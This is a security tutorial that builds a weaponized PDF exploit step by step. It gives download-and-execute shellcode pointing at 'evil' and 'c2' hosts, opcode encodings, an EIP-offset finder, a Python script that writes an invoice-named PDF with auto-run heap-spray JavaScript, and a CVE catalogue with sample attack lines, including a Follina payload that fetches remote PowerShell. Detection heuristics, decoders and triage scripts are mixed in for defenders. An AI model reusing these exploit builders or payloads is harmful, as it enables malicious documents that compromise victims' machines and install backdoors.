This section walks through the complete exploit development pipeline — the exact sequence of steps an attacker follows to go from a vulnerability discovery to a fully weaponized PDF that compromises a target system. Each step builds on the previous one: write assembly → assemble to machine code → encode the bytes → craft the overflow buffer → assemble the full payload → embed it inside a PDF structure → test the execution chain.
Understanding this pipeline is critical for defenders because each step creates artifacts that can be detected. Assembly patterns, encoding signatures, heap spray behavior, and suspicious PDF objects all generate signals that security tools can match against. The 7 steps below show exactly what the attacker creates at each stage, what it looks like, and how it works.
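As one example of such a signal, decoded JavaScript can be scored for the textual habits of a heap spray: many %u escapes, escapes whose two bytes are identical (sled material such as %u0c0c or %u9090), and a string that is repeatedly appended to itself. This is a heuristic sketch under those assumptions; the function name `spray_indicators` and the choice of features are illustrative, and a determined author can evade all of them.

```python
import re

UNICODE_ESCAPE = re.compile(r"%u[0-9a-fA-F]{4}")
# Matches "name += name", the doubling idiom used to grow a sled quickly.
DOUBLING = re.compile(r"\b(\w+)\s*\+=\s*\1\b")

def spray_indicators(js_source: str) -> dict[str, object]:
    """Collect simple static features that tend to accompany heap-spray scripts."""
    escapes = UNICODE_ESCAPE.findall(js_source)
    return {
        "unescape_calls": js_source.count("unescape("),
        "unicode_escapes": len(escapes),
        # Escapes like %u0c0c whose high and low bytes are the same value.
        "sled_like_escapes": sum(1 for e in escapes if e[2:4].lower() == e[4:6].lower()),
        "doubling_loop": bool(DOUBLING.search(js_source)),
    }

suspect = ('var n = unescape("%u0c0c%u0c0c"); '
           'while (n.length < 0x100000) { n += n; } '
           'var s = unescape("%ue8fc%u0082");')
print(spray_indicators(suspect))
```

No single feature is conclusive, but ordinary form-validation scripts rarely combine unescape(), repeated-byte escapes, and a self-doubling string.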
The attacker first writes the payload as raw x86 assembly — the lowest-level human-readable code that maps directly to CPU instructions. This shellcode must be position-independent (it can run from any memory address) and self-contained (it cannot rely on import tables or linker-resolved symbols). The shellcode's job is typically to find the Windows API functions it needs (LoadLibraryA, GetProcAddress, URLDownloadToFileA), then use them to download and execute a second-stage payload from the attacker's server.
Why assembly? The attacker needs the raw machine code bytes — not a compiled executable with headers, sections, and import tables. Shellcode runs in the context of a hijacked process (Adobe Reader in our case), so it must locate system DLLs at runtime by walking the PEB (Process Environment Block), a data structure every Windows process has that contains the list of loaded modules and their base addresses.
; ────────────────────────────────────────────────── ; Shellcode: Download & Execute via URLDownloadToFileA ; Target: Windows x86 (32-bit) ; ────────────────────────────────────────────────── ; HOW THIS WORKS: ; 1. Walk the PEB to find kernel32.dll's base address ; 2. Parse kernel32's export table to find GetProcAddress ; 3. Use GetProcAddress to resolve LoadLibraryA ; 4. Load urlmon.dll using LoadLibraryA ; 5. Resolve URLDownloadToFileA from urlmon.dll ; 6. Call URLDownloadToFileA("http://c2/beacon.exe", "C:\Temp\b.exe") ; 7. Call WinExec("C:\Temp\b.exe") to execute the download ; ────────────────────────────────────────────────── _start: cld ; Clear direction flag call find_kernel32 ; Locate kernel32.dll base find_kernel32: xor eax, eax ; EAX = 0 mov eax, [fs:0x30] ; EAX = PEB (Process Environment Block) mov eax, [eax+0x0c] ; EAX = PEB->Ldr mov eax, [eax+0x14] ; EAX = Ldr->InMemOrderModList mov eax, [eax] ; Skip first entry (ntdll.dll) mov eax, [eax] ; Second entry = kernel32.dll mov eax, [eax+0x10] ; EAX = kernel32 base address resolve_api: ; Walk the Export Address Table to find functions mov ebx, [eax+0x3c] ; PE header offset add ebx, eax ; EBX = PE header mov ebx, [ebx+0x78] ; Export table RVA add ebx, eax ; EBX = Export table ; ... hash-based API resolution continues ... download_exec: ; Call URLDownloadToFileA("http://evil/payload.exe", "C:\\Temp\\a.exe") push 0 ; lpfnCB = NULL push 0 ; dwReserved = 0 push esi ; szFileName (local path) push edi ; szURL (remote URL) push 0 ; pCaller = NULL call [URLDownloadToFileA] ; Download the payload ; Execute the downloaded file push esi ; lpCommandLine call [WinExec] ; Run it
The assembler (NASM, MASM, or FASM) converts each assembly instruction into its raw byte opcode, the exact bytes the CPU will execute. This is the binary machine code. Each assembly instruction maps to a hex sequence defined by the Intel/AMD instruction set architecture. For example, cld (clear direction flag) always assembles to the single byte FC, and xor eax, eax (set EAX to zero) assembles to 31 C0 (or to the equivalent encoding 33 C0, depending on the assembler).
What the assembler produces: A flat binary file — just raw bytes, no ELF/PE headers, no sections, no imports. This is what makes shellcode different from a normal compiled program. The output is the exact sequence of bytes that will be injected into the exploit buffer and executed directly by the CPU.
; Address Opcodes Assembly Instruction ; ───────── ──────────────── ────────────────────────── 00000000 FC cld 00000001 E8 82 00 00 00 call find_kernel32 00000006 60 pushad 00000007 89 E5 mov ebp, esp 00000009 31 C0 xor eax, eax 0000000B 64 8B 50 30 mov eax, [fs:0x30] ; PEB 0000000F 8B 52 0C mov edx, [edx+0x0c] ; Ldr 00000012 8B 52 14 mov edx, [edx+0x14] 00000015 8B 72 28 mov esi, [edx+0x28] 00000018 0F B7 4A 26 movzx ecx, [edx+0x26] 0000001C 31 FF xor edi, edi 0000001E AC lodsb 0000001F 3C 61 cmp al, 0x61 ; ... more instructions ... ; The raw byte sequence (the shellcode) is: FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52 10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20
The raw opcodes from Step 2 must be encoded for delivery inside the exploit vehicle. Different exploit vectors require different encoding formats because the bytes must survive the transport mechanism. A PDF JavaScript payload uses Unicode escapes (%ue8fc) because JavaScript's unescape() function turns each escape back into a 16-bit character, which is stored in memory as two raw bytes. An RTF exploit uses hex ASCII (fce882) because RTF \objdata fields are parsed as hex digit pairs. Web-based delivery uses URL encoding (%FC%E8), which the receiving side decodes.
Why encoding matters: The raw bytes (like 0x00 — a null byte) would break string-based transports. Encoding ensures every byte survives delivery. The exploit code on the receiving end decodes these back to the original raw bytes before executing them.
RAW BYTES (the opcodes from Step 2):
FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B

HEX STRING (for Python/C injection):
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b

URL ENCODED (for web-based delivery):
%FC%E8%82%00%00%00%60%89%E5%31%C0%64%8B%50%30%8B

UNICODE ESCAPE (for JavaScript heap spray):
%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30
↑ note: bytes are swapped in pairs (little-endian)
↑ FC E8 becomes %ue8fc (E8 first, then FC); 82 00 becomes %u0082

BASE64 (for obfuscation in scripts):
/OiCAAAAYInlMcBki1Awi...

HEX ASCII (for RTF/OLE embedding):
fce8820000006089e531c0648b50308b
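When analysing a sample, the useful direction is the reverse one: turning an encoded string found in a script or document back into bytes that a disassembler can read. The sketch below assumes the %u form with four hex digits per escape; the function name `decode_percent_u` is hypothetical. Hex ASCII needs no helper, since `bytes.fromhex` handles it directly.

```python
import re

def decode_percent_u(text: str) -> bytes:
    """Convert %uXXXX escapes to the bytes they occupy in memory (little-endian)."""
    out = bytearray()
    for hex_digits in re.findall(r"%u([0-9a-fA-F]{4})", text):
        # Each escape is one 16-bit value; the low byte comes first in memory.
        out += int(hex_digits, 16).to_bytes(2, "little")
    return bytes(out)

from_js = decode_percent_u("%ue8fc%u0082%u0000%u8960")
from_rtf = bytes.fromhex("fce8820000006089")
print(from_js.hex(" "))
print(from_js == from_rtf)
```

Both encodings decode to the same eight bytes, which shows that the byte swap in the %u form is only a property of the notation, not of the payload.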
This is the core of the exploit. The attacker needs to overflow a buffer so precisely that they overwrite the saved return address, the 4-byte value on the stack that is loaded into EIP (the Extended Instruction Pointer register) when the current function finishes. If the attacker controls that value, they control what code the CPU executes next.
How a buffer overflow works: When a function is called, the CPU pushes the return address onto the stack. The function then saves the caller's EBP (base pointer) and allocates a local buffer (e.g., 256 bytes for a string). If the function copies more data into this buffer than it can hold, the extra bytes "overflow" past the buffer's boundary and overwrite whatever is next on the stack. In this layout, bytes 257-260 land on the saved EBP and bytes 261-264 land on the saved return address. By carefully controlling the overflow, the attacker places a specific address in the return-address slot. When the function tries to return, the CPU jumps to the attacker's chosen address instead of the legitimate caller.
Why 0x0C0C0C0C? In a heap spray exploit, the attacker fills hundreds of megabytes of heap memory with sled + shellcode copies. The address 0x0C0C0C0C (about 192MB into the address space) is very likely to land inside the sprayed region. Overwriting the return address with this value makes the CPU jump into the sprayed heap, where it slides through the sled (0x0C bytes acting as NOP-equivalents; the classic NOP opcode is 0x90) until it hits the shellcode.
Here's how the attacker determines the exact offset to EIP — they use a cyclic pattern:
# Step 1: Generate a unique cyclic pattern # Every 4-byte sequence is unique, so when the app crashes, # the value in EIP tells us the exact offset from struct import pack # Generate pattern: Aa0Aa1Aa2Aa3Ab0Ab1Ab2... def cyclic(length): pattern = "" for upper in "ABCDEFGHIJKLMNOP": for lower in "abcdefghijklmnop": for digit in "0123456789": pattern += upper + lower + digit if len(pattern) >= length: return pattern[:length] return pattern # Send this to the vulnerable app payload = cyclic(500) # App crashes → debugger shows: EIP = 0x39624138 # Lookup: "8Ab9" at offset 260 in the pattern # → Buffer is 260 bytes before we hit EIP! OFFSET = 260 # exact bytes to reach EIP
Now the attacker combines everything from the previous steps into a single binary string — the exploit buffer. This buffer is laid out with surgical precision: exactly 260 bytes of junk (to fill the vulnerable buffer), then exactly 4 bytes that overwrite EIP with the heap spray address, then 64 bytes of NOP sled (a safety margin), then the shellcode itself. Every byte is in the exact right position. If a single byte is off, the exploit crashes the target instead of compromising it.
What this generates: A raw binary payload of ~670 bytes. The junk data fills the buffer; the EIP overwrite redirects execution; the NOP sled absorbs any address imprecision; and the shellcode does the actual work (download + execute a backdoor). This is the data that will be embedded in the PDF's JavaScript heap spray.
import struct # ── Configuration ── OFFSET = 260 # Bytes to reach saved EIP (from Step 4) EIP_ADDR = 0x0C0C0C0C # Target: heap spray address NOP_SIZE = 64 # NOP sled padding (safety margin) # ── Shellcode (from Step 2, hex-encoded) ── shellcode = ( b"\xfc\xe8\x82\x00\x00\x00\x60\x89" # cld; call; pushad b"\xe5\x31\xc0\x64\x8b\x50\x30\x8b" # PEB walk b"\x52\x0c\x8b\x52\x14\x8b\x72\x28" # Ldr modules b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c" # API resolution # ... ~300 more bytes ... b"\x57\x69\x6e\x45\x78\x65\x63\x00" # "WinExec\0" ) # ── Build the exploit buffer ── payload = b"A" * OFFSET # ← JUNK (fills buffer) payload += struct.pack("<I", EIP_ADDR) # ← EIP overwrite (4 bytes) payload += b"\x90" * NOP_SIZE # ← NOP sled (0x90 = NOP) payload += shellcode # ← The actual shellcode # Visual breakdown: # [AAAA...AAAA] [0C0C0C0C] [90909090...] [FCE88200...] # ← 260 bytes → ← 4 bytes → ← 64 bytes → ← ~342 bytes → # JUNK EIP NOP SLED SHELLCODE print(f"Payload size: {len(payload)} bytes") print(f" Junk: {OFFSET} bytes") print(f" EIP: 4 bytes → {hex(EIP_ADDR)}") print(f" NOP sled: {NOP_SIZE} bytes") print(f" Shellcode: {len(shellcode)} bytes")
The attacker uses Python to construct a malicious PDF from scratch — building each object manually and wiring them together. This is the step where the shellcode from Step 5 gets wrapped inside JavaScript (for heap spray delivery), compressed with zlib (FlateDecode), and embedded as a PDF stream object. The PDF's Catalog object gets a /OpenAction entry pointing to a JavaScript Action object that references the compressed stream. When Adobe Reader opens this file, it follows the chain: Catalog → /OpenAction → JavaScript Action → decompress stream → execute JavaScript → heap spray → trigger vuln → shellcode runs.
What this generates: A complete, valid PDF file (Invoice_March_2024.pdf) that any PDF reader will open without error. It displays normal content on screen while the hidden JavaScript payload executes in the background. The Python code below shows every line needed to generate this file — each PDF object is built as raw bytes and concatenated together.
import zlib import struct # ── Convert shellcode to JavaScript unescape format ── def to_js_unescape(shellcode_bytes): """Convert raw bytes to %uXXXX format (little-endian pairs)""" js = "" for i in range(0, len(shellcode_bytes), 2): if i + 1 < len(shellcode_bytes): # Swap bytes for little-endian: AB CD → %uCDAB js += f"%u{shellcode_bytes[i+1]:02x}{shellcode_bytes[i]:02x}" else: js += f"%u00{shellcode_bytes[i]:02x}" return js # ── Build the malicious JavaScript ── sc_js = to_js_unescape(shellcode) js_code = f""" var sc = unescape("{sc_js}"); // Heap spray: fill memory with NOP sled + shellcode var nop = unescape("%u0c0c%u0c0c"); while (nop.length < 0x100000) nop += nop; var block = nop.substring(0, 0x100000 - sc.length); var spray = new Array(); for (var i = 0; i < 200; i++) {{ spray[i] = block + sc; }} // Trigger the vulnerability Collab.collectEmailInfo({{subj: "A".repeat(0x4141)}}); """ # ── Compress the JavaScript (FlateDecode) ── js_compressed = zlib.compress(js_code.encode('latin-1')) # ── Build the PDF structure ── pdf = b"%PDF-1.7\n" # Object 1: Catalog with /OpenAction (auto-execute trigger) pdf += b"1 0 obj\n" pdf += b"<< /Type /Catalog /Pages 2 0 R" pdf += b" /OpenAction 4 0 R" # ← auto-runs on open! pdf += b" >>\nendobj\n\n" # Object 2: Pages pdf += b"2 0 obj\n" pdf += b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n" pdf += b"endobj\n\n" # Object 3: Page (shows innocent invoice content) pdf += b"3 0 obj\n" pdf += b"<< /Type /Page /Parent 2 0 R" pdf += b" /MediaBox [0 0 612 792] >>\n" pdf += b"endobj\n\n" # Object 4: JavaScript Action (the exploit!) pdf += b"4 0 obj\n" pdf += b"<< /Type /Action /S /JavaScript /JS 5 0 R >>\n" pdf += b"endobj\n\n" # Object 5: Compressed JavaScript stream (FlateDecode) pdf += b"5 0 obj\n" pdf += f"<< /Length {len(js_compressed)}".encode() pdf += b" /Filter /FlateDecode >>\n" pdf += b"stream\n" pdf += js_compressed # ← hex bytes! 
pdf += b"\nendstream\nendobj\n\n" # Write the xref table and trailer pdf += b"xref\n0 6\n" pdf += b"trailer << /Size 6 /Root 1 0 R >>\n" pdf += b"%%EOF" # ── Save the weaponized PDF ── with open("Invoice_March_2024.pdf", "wb") as f: f.write(pdf) print("[+] Malicious PDF generated: Invoice_March_2024.pdf") print(f"[+] JavaScript payload: {len(js_code)} bytes") print(f"[+] Compressed stream: {len(js_compressed)} bytes") print(f"[+] Total PDF size: {len(pdf)} bytes")
This is the moment of truth. The victim double-clicks Invoice_March_2024.pdf in their email. Adobe Reader opens it and displays a normal-looking invoice page, while in the background the exploit chain fires without any further interaction. The trace below is an illustrative reconstruction of that chain: parsing the PDF header, traversing the object tree, decompressing and executing the JavaScript, spraying the heap, triggering the vulnerability that overwrites the saved return address, the shellcode walking the PEB to find Windows APIs, and the final download-and-execute of the attacker's backdoor.
Why this is hard to detect: Everything happens within the legitimate AcroRd32.exe process. No new .exe is dropped until the very end. The JavaScript runs inside Adobe Reader's embedded SpiderMonkey engine. The heap spray uses normal memory allocation calls. The vulnerability trigger (Collab.collectEmailInfo) is a legitimate PDF API function. Only the final HTTP download and child process spawn create detectable external artifacts.
──── PDF OPEN ──── [AcroRd32] Parsing %PDF-1.7 header... OK [AcroRd32] Loading object 1 (Catalog) [AcroRd32] Found /OpenAction → Object 4 [AcroRd32] Object 4: /Action /JavaScript → Object 5 [AcroRd32] Object 5: FlateDecode stream, decompressing... ──── JAVASCRIPT ENGINE ──── [SpiderMonkey] Executing decoded JavaScript... [SpiderMonkey] unescape() → 342 bytes of shellcode decoded [SpiderMonkey] Heap spray: allocating 200 × 1MB blocks... [SpiderMonkey] Memory at 0x0C0C0C0C: 0C 0C 0C 0C 0C 0C ... ✓ ──── VULNERABILITY TRIGGER ──── [SpiderMonkey] Calling Collab.collectEmailInfo() [AcroRd32] BUFFER OVERFLOW in CollabEmailInfo() [AcroRd32] Stack: ESP: 0x0012F8A0 [41 41 41 41 41 41 41 41] ← junk EBP: 0x41414141 [overwritten with AAAA] ← junk EIP: 0x0C0C0C0C [overwritten by attacker!] ← HIJACKED ──── CPU FOLLOWS EIP ──── [CPU] EIP = 0x0C0C0C0C → jumping to heap... [CPU] Executing: 0C 0C → OR AL, 0x0C (harmless NOP) [CPU] Executing: 0C 0C → OR AL, 0x0C (harmless NOP) [CPU] Executing: 0C 0C → OR AL, 0x0C (sliding...) [CPU] ...sliding through NOP sled... [CPU] HIT SHELLCODE at 0x0C0D0000 [CPU] FC → cld [CPU] E8 82 00 → call find_kernel32 [CPU] 60 → pushad [CPU] 89 E5 → mov ebp, esp [CPU] 31 C0 → xor eax, eax [CPU] 64 8B 50 30 → mov eax, [fs:0x30] ; PEB ... resolving APIs ... downloading payload ... [CPU] WinExec("C:\\Temp\\backdoor.exe") → GAME OVER
pdf-parser.py and peepdf extract and decode JavaScript from PDF streams, revealing heap spray patterns and suspicious API calls like Collab.collectEmailInfo.
Signatures worth matching include %u0c0c%u0c0c NOP sled patterns, /OpenAction + /JavaScript combos, and known shellcode byte sequences.
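The static checks described above can be approximated in a few lines. This is a minimal triage sketch, not a replacement for pdf-parser.py or peepdf: the function names `decoded_streams` and `triage_pdf` are hypothetical, the marker lists are only the ones mentioned in this walkthrough, and the stream regex assumes simple, unencrypted PDFs with FlateDecode as the only filter.

```python
import re
import zlib

# Markers named in the walkthrough above; illustrative, not an exhaustive rule set.
STRUCT_MARKERS = (b"/OpenAction", b"/JavaScript", b"/JS")
SCRIPT_MARKERS = (b"%u0c0c%u0c0c", b"unescape(", b"Collab.collectEmailInfo")

# Body of each "stream ... endstream" pair; the lookbehind skips the tail of "endstream".
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def decoded_streams(pdf_bytes):
    """Yield each stream body, inflated when it is zlib (FlateDecode) data."""
    for match in STREAM_RE.finditer(pdf_bytes):
        raw = match.group(1)
        try:
            # decompressobj tolerates a trailing byte lost at the regex boundary.
            yield zlib.decompressobj().decompress(raw)
        except zlib.error:
            yield raw  # other filter or plain text: scan the bytes as-is


def triage_pdf(pdf_bytes):
    """Report which structural and script markers appear in the file."""
    structure = [m.decode() for m in STRUCT_MARKERS if m in pdf_bytes]
    script = []
    for body in decoded_streams(pdf_bytes):
        for marker in SCRIPT_MARKERS:
            if marker in body and marker.decode() not in script:
                script.append(marker.decode())
    return {"structure": structure, "script": script}
```

A file that reports both `/OpenAction` and a script marker such as `%u0c0c%u0c0c` deserves a closer look in a proper analysis tool; either marker alone is common in benign documents.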
The x86 (32-bit) examples above demonstrate core concepts. Modern targets are x86-64, with significant differences and additional mitigations.
Modern exploit chains typically combine an info leak (defeats ASLR by revealing a DLL base address), a ROP chain (defeats DEP by reusing existing code), and a sandbox escape (breaks out of application isolation). Each layer adds cost and complexity, which is why a working zero-click iOS chain is reported to cost $2.8M or more.
These are publicly documented vulnerabilities that have been weaponized in real-world attacks against governments, corporations, and individuals. Every single one has been patched. Studying them reveals the patterns attackers reuse, the code paths they target, and the detection opportunities defenders can exploit.
| CVE | Name | Type | CVSS | Severity | Year |
|---|---|---|---|---|---|
| CVE-2017-0199 | HTA Handler | Doc / OLE | 9.8 | CRITICAL | 2017 |
| CVE-2017-11882 | Equation Editor | Doc / Memory Corruption | 7.8 | HIGH | 2017 |
| CVE-2019-3568 | WhatsApp VoIP | Zero-Click / Buffer Overflow | 9.8 | CRITICAL | 2019 |
| CVE-2021-1732 | Win32k Priv Esc | Kernel / LPE | 7.8 | HIGH | 2021 |
| CVE-2021-30860 | FORCEDENTRY | Zero-Click / Image Parser | 7.8 | HIGH | 2021 |
| CVE-2021-40444 | MSHTML RCE | Doc / ActiveX | 7.8 | HIGH | 2021 |
| CVE-2022-30190 | Follina | Doc / MSDT Protocol | 7.8 | HIGH | 2022 |
| CVE-2023-36884 | Office HTML RCE | Doc / HTML Smuggling | 7.5 | HIGH | 2023 |
| CVE-2023-41064 | BLASTPASS | Zero-Click / Image | 7.8 | HIGH | 2023 |
Each CVE below is broken down into its full technical detail — the vulnerability, how it was exploited in the wild, what the attacker's exploit looked like, and what defenders should monitor for.
The Vulnerability (CVE-2017-0199, HTA Handler): When a Word document contained an OLE2 embedded object linking to an external URL, Word would fetch that URL and, if the server returned content with a Content-Type: application/hta header, pass the content directly to mshta.exe (the HTML Application host) for execution. This happened before any security prompt was shown to the user.
How Attackers Exploited It: The attacker crafted a .docx file with an embedded OLE object whose relationship target pointed to http://attacker.com/payload.hta. The document.xml.rels file contained: Target="http://attacker.com/payload.hta" TargetMode="External". When the victim opened the document, Word fetched the URL silently. The attacker's server returned an HTA file containing VBScript that ran Shell("powershell -enc [base64_payload]"). This executed arbitrary PowerShell commands with the user's privileges.
Detection: Monitor for mshta.exe spawned as a child process of WINWORD.EXE. Look for outbound HTTP requests from Office processes. YARA rule: match on OLE2Link + external URL in relationship files.
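The relationship-file check mentioned above can be sketched with the standard library alone. This is a rough illustration under stated assumptions: the function name `external_non_hyperlink_targets` is hypothetical, ordinary hyperlinks are treated as benign and skipped, and a production scanner handling untrusted files would want a hardened XML parser rather than `xml.etree`.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by OOXML package relationship parts (*.rels).
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_non_hyperlink_targets(docx_bytes):
    """Return (part, relationship kind, target) for external links that are not hyperlinks."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for part in archive.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(part))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                # The relationship Type is a URI; its last path segment names the kind.
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                if kind != "hyperlink":
                    hits.append((part, kind, rel.get("Target", "")))
    return hits
```

Any hit is a lead rather than a verdict: some legitimate documents link external images or templates, so the target URL and relationship kind still need a human or a reputation check.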
The Vulnerability (CVE-2017-11882, Equation Editor): Microsoft's Equation Editor (EQNEDT32.EXE) was a 17-year-old component compiled in November 2000 without ASLR, DEP, or stack canaries. It processed OLE Equation objects embedded in Office documents. A font name field in the MTEF (MathType Equation Format) data had a fixed 48-byte buffer with no bounds checking. Writing more than 48 bytes into this field overflowed the stack and overwrote the return address.
How Attackers Exploited It: The exploit embedded a crafted Equation object inside a .docx file. The font name field was filled with 44 bytes of padding + the address 0x00402114 (a fixed address inside EQNEDT32.EXE pointing to a WinExec() gadget, reliable because no ASLR). After the return address, the attacker placed a command string like cmd /c powershell -nop -w hidden -enc [base64]. When Equation Editor processed the font name, it overflowed → returned into WinExec → executed the command. The entire exploit payload was 92 bytes.
Why It Was So Dangerous: No ASLR meant the return address never changed. No DEP meant stack data could be executed. No canaries meant the overflow was never detected. The exploit worked reliably across every Windows version and every Office version that shipped EQNEDT32.EXE — for 17 years of installs.
Detection: Monitor for EQNEDT32.EXE spawning child processes (it should never do this). YARA rule: match on Equation OLE CLSID {0002CE02-0000-0000-C000-000000000046} with font name length > 48 bytes.
The Vulnerability (CVE-2019-3568, WhatsApp VoIP): WhatsApp's VoIP (Voice over IP) implementation used the SRTP (Secure Real-time Transport Protocol) stack to process incoming call setup packets. A buffer overflow existed in the SRTCP (SRTP Control Protocol) handler that parsed incoming packet data. The parser read a length field from the packet and used it to copy data into a fixed-size buffer without validating that the length was within bounds.
How Attackers Exploited It: The NSO Group's Pegasus spyware used this vulnerability. The attack was completely zero-click: the attacker sent a specially crafted series of SRTCP packets by initiating a call to the victim's phone number. The victim's phone didn't even need to answer, because WhatsApp processed the call setup packets automatically. The overflow in the SRTCP handler hijacked control flow and loaded the Pegasus payload, which gained full access to the device (messages, camera, microphone, GPS, passwords). The call log entry was then deleted so the victim saw nothing.
Detection: Correlate incoming WhatsApp calls with no call log entry. Monitor for unexpected process memory modifications after WhatsApp network activity. WhatsApp published hashes of the exploit packets for forensic analysis.
The Vulnerability (CVE-2021-1732, Win32k Priv Esc): A type confusion bug in the Windows kernel's win32kfull!xxxClientAllocWindowClassExtraBytes function. When a window was created with extra bytes (cbWndExtra), the kernel allocated memory and returned a pointer. An attacker could manipulate the window creation process to cause the kernel to use a user-mode callback that returned a different allocation, creating a type confusion where the kernel treated user-controlled data as a kernel object pointer.
How Attackers Exploited It: This was a privilege escalation exploit, used after initial access (e.g., via a document exploit) to go from user-level to SYSTEM. The attacker created a window with a specific cbWndExtra value, hooked the user-mode callback xxxClientAllocWindowClassExtraBytes, returned a crafted buffer from the callback, and the kernel wrote a kernel pointer into attacker-controlled memory. This gave arbitrary kernel read/write, used to steal the SYSTEM process token and assign it to the attacker's process.
The Chain: Often seen as Stage 2 in attack chains — a document exploit gains initial code execution (Stage 1), then CVE-2021-1732 escalates to SYSTEM (Stage 2), then the attacker dumps credentials with Mimikatz (Stage 3).
Detection: Monitor for user-mode processes making unusual NtUserConsoleControl syscalls. Kernel exploit artifacts include processes with a SYSTEM token that were launched from browser or Office contexts.
The Vulnerability (CVE-2021-30860, FORCEDENTRY): An integer overflow in Apple's CoreGraphics framework, specifically in the JBIG2 image decoder used to render PDF content in iMessage. JBIG2 is a lossless compression standard for bi-level (black and white) images. Apple's implementation had a flaw where a crafted JBIG2 stream with specific segment parameters could cause an integer overflow in a size calculation, leading to a heap buffer overflow.
How Attackers Exploited It: NSO Group sent an iMessage to the target containing a PDF file disguised as a .gif (iMessage rendered it automatically, zero-click). The PDF contained a JBIG2 stream with over 70,000 segment commands that, taken together, defined a virtual computer architecture. The JBIG2 segments were used as logical operations (AND, OR, XOR, NOT) on memory regions, implementing a full virtual machine with registers, an ALU, and conditional branching — all within the JBIG2 decompression engine. This VM then bootstrapped a more capable exploit that escaped the iMessage sandbox to install Pegasus.
Why This Was Unprecedented: Google Project Zero called it "one of the most technically sophisticated exploits we've ever seen." The attacker built a Turing-complete computer inside an image decoder — no JavaScript, no JIT, no scripting engine. Pure data manipulation through a compression standard's legitimate operations.
Detection: Look for PDF files received via iMessage with unusually large JBIG2 streams (>10KB is suspicious). Apple added the BlastDoor sandbox in iOS 14 to isolate iMessage parsing, but FORCEDENTRY bypassed it. The bug itself was patched in iOS 14.8, and iOS 15 hardened JBIG2 parsing significantly.
The Vulnerability (CVE-2021-40444, MSHTML RCE): Microsoft's MSHTML (Trident) engine, the same engine behind Internet Explorer, could be invoked by Office documents to render HTML content. A flaw allowed a specially crafted ActiveX control to be downloaded and instantiated through MSHTML when processing Office documents with embedded HTML content. The ActiveX control could execute arbitrary code because Office did not properly restrict which controls could be loaded.
How Attackers Exploited It: The attacker sent a .docx file that contained a document.xml.rels relationship pointing to an external HTML page: http://attacker.com/exploit.html. When Word loaded this page through MSHTML, the HTML contained an <object> tag that downloaded a .CAB file from the attacker's server. Inside the CAB was a malicious .DLL renamed with a .INF extension. MSHTML extracted the CAB, loaded the DLL via a crafted directory traversal path in the CAB extraction, and the DLL began executing as a child of Word — downloading and running a Cobalt Strike beacon.
Detection: Monitor for WINWORD.EXE making HTTP requests to external servers. Look for .CAB file extraction in temporary directories. YARA rule: match on mhtml: protocol handler references in document.xml.rels.
The Vulnerability (CVE-2022-30190, Follina): The ms-msdt: protocol handler (Microsoft Support Diagnostic Tool) accepted command-line arguments via URL. When an Office document loaded an external HTML page that used the ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=..." URL scheme, MSDT would launch and process the parameters. The IT_BrowseForFile parameter was expanded by sdiagnhost.exe using PowerShell's Invoke-Expression, meaning any value in this parameter became executable PowerShell code.
How Attackers Exploited It: The attack chain was: (1) .docx with external relationship → (2) Word fetches HTML from attacker server → (3) HTML contains: location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=$(IEX($(Invoke-RestMethod http://c2/payload.ps1))\"" → (4) MSDT launches → (5) sdiagnhost.exe runs PowerShell → (6) attacker has code execution. Critically, this worked even in Protected View for .RTF files — the preview pane in Windows Explorer triggered it without even opening the file.
Detection: Monitor for msdt.exe or sdiagnhost.exe spawned as children of Office processes. Mitigation: disable the protocol handler entirely by deleting the ms-msdt registry key, after exporting a backup of it first: reg export HKCR\ms-msdt <backup-file>, then reg delete HKCR\ms-msdt /f.
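The parent/child checks named in the Detection notes for CVE-2017-0199, CVE-2017-11882, and Follina boil down to a small lookup. The sketch below assumes process-creation events are already available as image paths (for example from an EDR or Sysmon export); the function name `classify_spawn` and the exact process lists are illustrative assumptions, not a vendor rule.

```python
# Process names taken from the Detection notes above; extend to suit the environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
CHILDREN_TO_FLAG = {"mshta.exe", "msdt.exe", "sdiagnhost.exe"}
SHOULD_NEVER_SPAWN = {"eqnedt32.exe"}


def _image_name(path):
    """Reduce a full image path to a lowercase file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_spawn(parent_image, child_image):
    """Return a short reason string when the pair looks suspicious, else None."""
    parent = _image_name(parent_image)
    child = _image_name(child_image)
    if parent in SHOULD_NEVER_SPAWN:
        return f"{parent} spawned {child}; it should not create child processes"
    if parent in OFFICE_PARENTS and child in CHILDREN_TO_FLAG:
        return f"Office process {parent} spawned {child}"
    return None
```

Matching on image name alone is easy to evade by renaming binaries, so a real rule would also compare original file names or hashes where the telemetry provides them.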
The Vulnerability (CVE-2023-36884, Office HTML RCE): A complex chain of vulnerabilities in how Microsoft Office processed HTML content through the MSHTML engine. Multiple security checks could be bypassed using special URL constructions and file path handling, allowing remote code execution when a user opened a specially crafted Office document, even with macros disabled.
